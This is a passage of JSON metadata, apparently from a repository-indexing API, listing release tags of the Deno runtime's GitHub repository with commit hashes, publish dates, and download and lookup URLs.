.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland